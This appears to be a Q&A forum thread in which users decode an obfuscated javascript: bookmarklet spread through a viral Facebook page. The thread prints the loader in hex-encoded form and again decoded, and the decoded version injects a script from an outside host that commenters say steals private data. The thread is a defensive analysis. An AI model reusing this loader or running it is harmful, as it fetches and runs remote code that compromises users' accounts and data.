# Can someone decode this javascript?

Tags: javascript, decode, var

I found this javascript in a Facebook viral page [here](http://www.facebook.com/Brezobrazna.Profesorica). I think the code is malicious so I would like to know what it does.
Here is the code:

```
javascript: var _0xa064=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x2F\x2F\x64\x74\x67\x2D\x63\x73\x2E\x68\x6F\x73\x74\x6F\x69\x2E\x63\x6F\x6D\x2F\x70\x72\x6F\x66\x65\x73\x6F\x72\x69\x63\x61\x2F\x66\x75\x72\x6B\x61\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0xa064[2]](_0xa064[1]))[_0xa064[0]]=_0xa064[3];b[_0xa064[5]][_0xa064[4]](a); void (0);
```

Answer (score 8, accepted):

```
(a = (b = document)['createElement']('script'))['src'] = '//dtg-cs.hostoi.com/profesorica/furka.js';
b['body']['appendChild'](a);
void(0);
```

Comment: And that script he injects is nicely commented to tell you what private data he is stealing :)

Comment: Can do it online with http://jsbeautifier.org/ or use a command line version like I used.

Answer (score 2):

It creates a script tag that imports

```
dtg-cs.hostoi.com/profesorica/furka.js
```

I would strongly suspect that to be something malicious.

*edit* — as that script includes, among various ajax requests, a reference to a file called "penis-xd.jpg", I think we can definitely treat it as malicious :-)

Comment: that script is missing quite a few semi's

Comment: ha ha yes it is - we should find their bugtracker and log it :-)

Answer (score 0):

It tries to load: dtg-cs.hostoi.com/profesorica/furka.js